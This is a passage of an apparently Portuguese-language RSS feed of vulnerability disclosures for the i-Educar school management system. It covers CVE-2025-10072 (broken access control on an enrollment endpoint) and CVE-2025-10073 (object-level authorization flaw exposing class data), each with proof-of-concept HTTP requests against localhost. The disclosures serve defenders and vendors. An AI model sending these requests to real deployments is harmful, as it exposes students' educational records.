    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10072</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10072/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10072/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10072-controle-de-acesso-quebrado-no-endpoint-matriculaid_studententurmarid_class&amp;#34;&amp;gt;CVE-2025-10072: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10072-controle-de-acesso-quebrado-no-endpoint-matriculaid_studententurmarid_class&amp;#34;&amp;gt;CVE-2025-10072: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10072&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autenticar como um usuário sem privilégios.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10072/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10072/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10072/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10072/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10072/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10072/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte solicitação:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /matricula/206/enturmar/23 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_matricula_turma_lst.php?ref_cod_matricula=206&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ano_letivo=2025
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função de cadastrar alunos nas turmas. E este usuário não deveria fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10072/image-2.png&amp;#34;
	width=&amp;#34;1555&amp;#34;
	height=&amp;#34;666&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10072/image-2_hu_d70819db70f9d571.png 480w, /p/cve-2025-10072/image-2_hu_b5fb0c0419366edd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 07 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10073</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10073/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10073/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10073-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleapiturma&amp;#34;&amp;gt;CVE-2025-10073: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma &amp;lt;b&amp;gt;divulgação não autorizada de informações de estrutura acadêmica&amp;lt;/b&amp;gt;, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10073-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleapiturma&amp;#34;&amp;gt;CVE-2025-10073: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10073&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Api/turma&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma &amp;lt;b&amp;gt;divulgação não autorizada de informações de estrutura acadêmica&amp;lt;/b&amp;gt;, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /module/Api/turma&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue aplicar a &amp;lt;b&amp;gt;autorização em nível de objeto&amp;lt;/b&amp;gt; ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Comportamento esperado:&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Usuários não autorizados devem receber a mensagem 403 &amp;#34;Proibido&amp;#34; ou uma resposta vazia.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Comportamento observado:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autentique como um usuário sem privilégios (por exemplo, aluno, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10073/image.png&amp;#34;
	width=&amp;#34;1380&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10073/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-10073/image_hu_374181a535d27950.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10073/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;616&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10073/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10073/image-1_hu_5d2f89eaf0785474.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;329px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Envie a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/turma?&amp;amp;amp;oper=get&amp;amp;amp;resource=turma&amp;amp;amp;id=14 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_turma_det.php?cod_turma=14
